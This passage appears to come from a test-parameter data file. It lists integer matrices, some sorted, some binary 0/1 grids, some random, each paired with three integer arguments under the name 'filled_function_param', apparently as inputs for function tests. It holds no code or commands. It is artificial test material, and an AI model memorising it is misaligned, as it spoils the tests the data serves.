([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],19,26,34,),
([[37, 36, 46, 54, 59, 38, 5, 91, 97, 28, 88, 14, 71, 52, 71, 38, 62, 81, 19, 41, 19, 28, 42, 29, 19], [10, 82, 70, 27, 5, 9, 26, 78, 21, 71, 40, 27, 18, 75, 92, 49, 94, 39, 30, 12, 38, 13, 89, 19, 42], [23, 28, 28, 44, 55, 87, 49, 69, 37, 58, 6, 83, 75, 54, 80, 85, 62, 55, 2, 53, 75, 7, 65, 66, 16], [3, 84, 78, 20, 78, 29, 38, 84, 2, 24, 46, 84, 28, 34, 96, 14, 43, 13, 14, 63, 65, 35, 14, 12, 36], [78, 75, 60, 86, 45, 47, 55, 18, 55, 50, 99, 1, 85, 21, 6, 21, 76, 85, 55, 75, 97, 5, 70, 1, 59], [71, 65, 92, 91, 32, 85, 43, 5, 77, 47, 38, 76, 70, 67, 57, 16, 31, 74, 61, 51, 67, 47, 26, 80, 32], [29, 50, 99, 33, 47, 29, 34, 12, 53, 93, 63, 87, 76, 5, 95, 94, 6, 41, 8, 54, 25, 44, 53, 67, 31], [28, 55, 3, 82, 19, 68, 11, 87, 33, 99, 74, 71, 30, 45, 8, 92, 57, 14, 67, 83, 4, 14, 32, 98, 54], [73, 86, 44, 26, 40, 12, 73, 81, 24, 12, 68, 3, 88, 96, 59, 69, 70, 89, 34, 91, 23, 32, 25, 57, 97], [59, 2, 66, 32, 52, 39, 59, 31, 60, 36, 79, 94, 36, 69, 90, 50, 68, 45, 35, 48, 50, 91, 75, 48, 17], [27, 42, 95, 7, 3, 77, 3, 36, 73, 65, 43, 49, 87, 79, 87, 39, 33, 4, 75, 80, 48, 23, 52, 15, 4], [34, 98, 83, 15, 26, 65, 83, 18, 33, 90, 87, 98, 79, 36, 47, 26, 88, 42, 49, 73, 96, 84, 69, 73, 41], [30, 91, 12, 61, 1, 28, 66, 48, 58, 49, 82, 68, 31, 63, 42, 64, 72, 99, 66, 27, 93, 97, 98, 25, 83], [14, 66, 57, 58, 89, 54, 65, 94, 87, 90, 14, 91, 41, 87, 42, 73, 94, 46, 65, 21, 20, 76, 91, 11, 1], [54, 41, 37, 8, 21, 35, 29, 89, 9, 32, 90, 86, 22, 81, 57, 92, 85, 8, 3, 77, 16, 96, 73, 59, 36], [94, 25, 80, 39, 57, 56, 88, 46, 79, 74, 14, 85, 97, 17, 65, 26, 35, 80, 12, 2, 72, 84, 12, 28, 36], [7, 82, 61, 53, 20, 62, 56, 64, 93, 29, 28, 17, 34, 9, 99, 62, 55, 60, 94, 72, 3, 56, 38, 30, 68], [32, 37, 47, 37, 79, 34, 27, 92, 85, 42, 12, 41, 57, 88, 49, 93, 77, 64, 78, 89, 10, 31, 81, 3, 18], [73, 86, 76, 80, 29, 53, 23, 25, 97, 20, 49, 96, 12, 43, 41, 55, 83, 48, 24, 79, 51, 72, 72, 16, 44], [35, 69, 45, 71, 40, 46, 53, 15, 60, 58, 31, 77, 59, 70, 7, 37, 24, 7, 30, 90, 19, 34, 82, 58, 61], [92, 8, 73, 52, 16, 68, 69, 12, 18, 55, 74, 52, 14, 75, 40, 89, 15, 68, 43, 10, 40, 38, 87, 83, 41], [70, 45, 63, 22, 59, 29, 56, 94, 20, 2, 58, 10, 13, 1, 95, 9, 92, 90, 77, 78, 17, 63, 76, 29, 66], [46, 33, 15, 28, 85, 88, 31, 95, 71, 91, 41, 16, 85, 14, 66, 18, 11, 21, 31, 12, 78, 61, 91, 80, 90], [35, 54, 35, 42, 80, 95, 91, 20, 64, 12, 91, 43, 87, 9, 38, 75, 16, 1, 2, 44, 70, 58, 73, 54, 46], [46, 43, 27, 4, 11, 51, 58, 70, 39, 63, 4, 17, 42, 52, 93, 51, 11, 78, 50, 34, 25, 46, 61, 14, 62]],20,18,19,)
]
filled_function_param = [
([[16, 25, 26, 30, 34, 42, 51, 57, 69, 80], [15, 24, 29, 30, 31, 50, 55, 60, 71, 83], [6, 16, 22, 28, 34, 56, 61, 86, 88, 89], [14, 22, 24, 25, 26, 48, 73, 76, 78, 88], [2, 2, 12, 28, 28, 67, 68, 80, 81, 83], [8, 18, 27, 41, 62, 76, 77, 89, 94, 98], [9, 36, 41, 44, 47, 49, 76, 91, 92, 92], [18, 19, 27, 28, 29, 31, 43, 73, 93, 95], [32, 44, 59, 66, 70, 79, 88, 93, 94, 98], [12, 25, 29, 32, 37, 63, 71, 78, 82, 95]],7,5,8,),
([[-38]],0,0,0,),
([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]],12,15,12,),
([[68, 97, 94, 63, 48, 25, 30, 82, 73, 97, 42, 31, 9, 59, 43, 91, 55, 60, 65, 83, 19, 21, 47, 80, 9, 30, 12, 53, 31, 96, 37, 21, 5], [62, 34, 83, 77, 34, 35, 41, 14, 24, 18, 14, 76, 55, 36, 73, 3, 51, 81, 90, 88, 3, 7, 79, 51, 42, 14, 65, 39, 45, 79, 47, 74, 92], [78, 98, 95, 41, 33, 99, 51, 12, 70, 31, 41, 1, 75, 58, 29, 98, 97, 9, 87, 49, 56, 97, 8, 86, 56, 94, 88, 31, 99, 99, 8, 16, 27], [79, 45, 86, 35, 35, 95, 56, 1, 27, 66, 74, 95, 8, 49, 70, 90, 24, 3, 2, 87, 21, 84, 79, 42, 48, 22, 46, 35, 69, 55, 66, 22, 57], [54, 64, 52, 77, 96, 11, 11, 11, 77, 64, 13, 83, 34, 10, 78, 98, 89, 32, 21, 69, 8, 21, 83, 60, 53, 61, 85, 32, 16, 90, 53, 70, 5], [57, 48, 60, 88, 88, 63, 13, 12, 96, 91, 41, 24, 12, 57, 41, 80, 77, 5, 93, 98, 67, 71, 72, 8, 61, 23, 2, 98, 71, 8, 55, 84, 33], [84, 13, 33, 28, 81, 75, 60, 73, 25, 7, 26, 75, 90, 44, 3, 43, 20, 93, 58, 93, 99, 73, 89, 66, 93, 25, 14, 12, 68, 48, 90, 49, 54], [68, 70, 22, 76, 53, 91, 22, 91, 37, 2, 39, 87, 8, 2, 23, 88, 26, 52, 87, 61, 51, 91, 76, 9, 1, 51, 26, 88, 38, 97, 93, 19, 40], [11, 38, 60, 75, 89, 11, 5, 66, 67, 24, 38, 53, 92, 73, 26, 9, 37, 17, 34, 30, 38, 61, 20, 26, 41, 71, 4, 98, 40, 92, 5, 50, 92], [2, 14, 54, 67, 28, 40, 91, 98, 46, 78, 31, 41, 24, 44, 11, 16, 34, 42, 49, 21, 82, 55, 52, 42, 82, 76, 47, 1, 18, 32, 58, 97, 13], [51, 79, 86, 84, 72, 9, 22, 35, 8, 27, 61, 56, 15, 39, 2, 66, 34, 63, 46, 29, 37, 3, 76, 61, 98, 58, 53, 91, 32, 10, 89, 96, 88], [67, 93, 71, 25, 11, 64, 81, 11, 55, 42, 65, 72, 33, 49, 73, 81, 27, 49, 68, 15, 99, 81, 92, 89, 14, 98, 77, 1, 7, 45, 35, 25, 86], [44, 33, 37, 61, 82, 71, 26, 70, 71, 76, 9, 51, 99, 55, 8, 73, 40, 12, 78, 40, 60, 54, 9, 17, 90, 32, 5, 24, 43, 73, 29, 23, 46], [74, 40, 32, 49, 88, 92, 42, 22, 64, 80, 29, 37, 8, 39, 52, 71, 34, 45, 69, 44, 23, 37, 50, 27, 67, 63, 2, 64, 76, 22, 83, 44, 74], [75, 7, 37, 31, 54, 60, 18, 20, 61, 53, 71, 11, 15, 72, 7, 1, 27, 41, 62, 46, 35, 5, 3, 53, 62, 5, 40, 31, 56, 84, 95, 82, 1], [82, 2, 45, 21, 88, 83, 70, 39, 68, 83, 46, 49, 91, 3, 93, 98, 63, 25, 27, 43, 50, 43, 47, 62, 62, 7, 38, 72, 57, 48, 99, 64, 46], [45, 38, 98, 12, 57, 98, 34, 44, 73, 7, 27, 97, 79, 51, 36, 10, 76, 14, 19, 7, 31, 19, 86, 99, 39, 78, 44, 13, 37, 35, 44, 37, 91], [61, 70, 68, 52, 18, 25, 86, 19, 3, 28, 2, 35, 82, 40, 38, 57, 55, 2, 6, 98, 73, 68, 96, 98, 21, 72, 2, 8, 48, 13, 96, 36, 25], [99, 25, 21, 80, 47, 21, 29, 49, 24, 99, 40, 57, 59, 36, 13, 65, 15, 56, 45, 32, 97, 68, 71, 7, 19, 54, 1, 19, 38, 85, 28, 65, 98], [38, 93, 22, 1, 1, 79, 75, 87, 39, 49, 15, 66, 97, 98, 40, 73, 33, 78, 77, 27, 60, 45, 55, 89, 10, 93, 72, 78, 40, 40, 64, 59, 62], [87, 55, 14, 80, 62, 56, 91, 80, 1, 16, 60, 84, 55, 34, 38, 92, 1, 70, 67, 68, 93, 81, 73, 56, 35, 90, 73, 87, 33, 87, 55, 99, 99], [26, 75, 52, 1, 78, 3, 57, 85, 36, 21, 18, 51, 26, 30, 45, 95, 24, 97, 75, 68, 36, 93, 92, 37, 88, 43, 37, 29, 94, 83, 96, 38, 65], [98, 30, 29, 8, 74, 61, 86, 22, 14, 49, 93, 47, 66, 4, 7, 39, 58, 62, 32, 95, 34, 23, 65, 9, 21, 47, 45, 44, 12, 98, 91, 92, 28], [37, 35, 69, 31, 40, 54, 30, 30, 37, 4, 17, 33, 24, 75, 25, 84, 59, 66, 96, 92, 87, 56, 48, 16, 32, 89, 39, 44, 30, 73, 24, 48, 47], [83, 82, 6, 7, 25, 91, 38, 58, 10, 20, 79, 35, 18, 7, 87, 56, 31, 51, 15, 98, 22, 29, 61, 2, 12, 78, 7, 91, 77, 63, 87, 87, 18], [35, 75, 62, 70, 16, 58, 92, 60, 32, 16, 24, 9, 78, 25, 76, 54, 75, 16, 50, 2, 19, 69, 29, 92, 34, 59, 58, 12, 94, 45, 62, 89, 12], [14, 83, 42, 74, 93, 58, 96, 94, 25, 30, 81, 26, 47, 36, 26, 8, 33, 70, 94, 96, 99, 64, 96, 25, 36, 88, 49, 39, 60, 6, 43, 24, 65], [52, 96, 76, 29, 65, 68, 26, 21, 13, 75, 49, 52, 47, 10, 16, 97, 51, 87, 73, 86, 5, 99, 48, 40, 27, 37, 58, 60, 1, 49, 2, 26, 48], [22, 81, 11, 10, 42, 96, 27, 51, 69, 8, 92, 12, 41, 93, 75, 30, 18, 12, 98, 4, 61, 6, 43, 55, 72, 41, 92, 91, 49, 21, 74, 49, 5], [97, 63, 36, 47, 3, 35, 51, 12, 85, 90, 99, 2, 37, 31, 19, 1, 25, 52, 61, 37, 60, 11, 37, 35, 53, 17, 95, 77, 12, 42, 41, 71, 30], [77, 40, 69, 61, 43, 22, 79, 66, 52, 28, 34, 37, 19, 26, 51, 17, 13, 79, 38, 87, 63, 98, 24, 15, 99, 70, 85, 63, 2, 78, 6, 9, 13], [18, 86, 88, 50, 35, 77, 66, 32, 72, 8, 54, 10, 11, 64, 35, 22, 50, 43, 58, 28, 61, 9, 47, 33, 92, 64, 69, 38, 1, 73, 77, 49, 58], [84, 47, 49, 83, 59, 14, 86, 10, 76, 62, 25, 16, 59, 72, 45, 41, 52, 24, 90, 18, 44, 73, 56, 69, 30, 79, 90, 4, 33, 27, 72, 87, 37]],18,17,20,),
([[-20, -14, 14, 84], [-34, -24, 46, 96], [18, 36, 66, 80], [-32, 28, 58, 94]],3,3,3,),
([[0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1], [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1], [1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1], [1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1], [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1], [1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0], [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0], [0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0], [1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0], [1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1], [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1], [1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1], [1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0], [0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0], [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1], [1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0], [1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0], [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0], [0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0], [0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1], [0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0]],14,25,17,),
([[2, 3, 4, 9, 11, 11, 11, 12, 15, 15, 19, 20, 20, 23, 24, 25, 29, 29, 29, 33, 34, 38, 41, 41, 44, 46, 48, 54, 54, 58, 60, 61, 62, 62, 62, 68, 68, 72, 73, 79, 79, 80, 83, 86, 92, 99, 99], [3, 3, 4, 4, 4, 6, 12, 16, 17, 17, 18, 18, 18, 19, 19, 21, 25, 28, 29, 30, 30, 32, 35, 38, 39, 42, 50, 53, 61, 65, 65, 65, 70, 71, 75, 80, 81, 84, 84, 89, 92, 92, 95, 95, 96, 98, 99], [2, 4, 7, 9, 10, 14, 17, 21, 22, 23, 24, 28, 29, 31, 31, 33, 33, 37, 37, 38, 39, 41, 42, 42, 45, 48, 48, 58, 60, 62, 63, 66, 73, 73, 75, 76, 76, 80, 83, 85, 86, 86, 91, 94, 99, 99, 99], [1, 1, 3, 6, 6, 6, 8, 12, 16, 17, 18, 24, 25, 27, 30, 33, 35, 39, 39, 41, 45, 48, 50, 50, 53, 53, 53, 55, 56, 57, 58, 60, 64, 69, 71, 73, 73, 74, 76, 78, 82, 84, 85, 93, 94, 98, 99], [1, 1, 4, 7, 9, 9, 14, 14, 16, 16, 19, 24, 24, 25, 25, 27, 28, 28, 30, 32, 34, 34, 36, 37, 38, 39, 41, 41, 45, 47, 54, 56, 57, 63, 66, 67, 71, 72, 79, 82, 83, 83, 83, 91, 92, 97, 97], [5, 8, 8, 9, 9, 14, 15, 18, 18, 22, 22, 24, 25, 25, 28, 28, 29, 29, 36, 38, 50, 56, 62, 63, 69, 69, 69, 70, 70, 70, 70, 74, 76, 80, 80, 84, 85, 87, 89, 89, 89, 89, 96, 97, 97, 98, 98], [1, 3, 6, 6, 8, 9, 10, 11, 14, 16, 20, 21, 21, 26, 27, 27, 29, 30, 37, 37, 38, 43, 43, 47, 47, 47, 48, 50, 51, 52, 53, 59, 59, 60, 61, 65, 65, 67, 71, 71, 78, 83, 87, 88, 88, 90, 99], [1, 1, 3, 6, 7, 8, 8, 13, 13, 14, 14, 17, 17, 18, 20, 25, 28, 29, 29, 30, 31, 33, 34, 38, 40, 43, 49, 50, 53, 56, 61, 62, 63, 64, 69, 70, 75, 81, 85, 88, 90, 91, 93, 93, 94, 95, 97], [1, 4, 5, 6, 6, 6, 6, 7, 10, 13, 13, 16, 21, 25, 26, 27, 32, 32, 33, 37, 37, 40, 43, 45, 47, 50, 51, 52, 53, 56, 58, 60, 61, 61, 67, 70, 75, 78, 82, 83, 85, 85, 86, 90, 92, 94, 94], [3, 5, 5, 5, 10, 10, 12, 14, 15, 16, 19, 20, 27, 29, 30, 32, 39, 40, 40, 40, 46, 49, 50, 53, 56, 58, 59, 59, 59, 59, 61, 65, 68, 76, 80, 83, 83, 85, 86, 87, 88, 89, 89, 89, 91, 93, 95], [2, 2, 7, 10, 10, 11, 11, 12, 15, 18, 21, 23, 24, 26, 27, 30, 32, 33, 33, 34, 35, 35, 35, 36, 38, 39, 40, 41, 41, 43, 43, 45, 50, 51, 56, 60, 62, 73, 74, 76, 76, 79, 87, 89, 89, 90, 99], [2, 3, 8, 10, 10, 15, 15, 15, 22, 22, 25, 26, 28, 28, 29, 32, 34, 36, 36, 37, 39, 39, 40, 41, 44, 46, 47, 54, 55, 58, 67, 69, 69, 70, 70, 71, 72, 84, 84, 85, 89, 91, 93, 96, 96, 97, 98], [2, 5, 6, 6, 12, 12, 17, 18, 19, 19, 21, 22, 27, 37, 37, 38, 40, 41, 50, 53, 54, 57, 58, 61, 62, 63, 64, 70, 71, 72, 72, 72, 77, 77, 79, 80, 84, 88, 90, 91, 93, 97, 97, 98, 98, 99, 99], [1, 1, 2, 5, 9, 12, 14, 18, 18, 18, 19, 20, 21, 26, 27, 36, 37, 40, 41, 43, 46, 46, 47, 48, 51, 51, 53, 54, 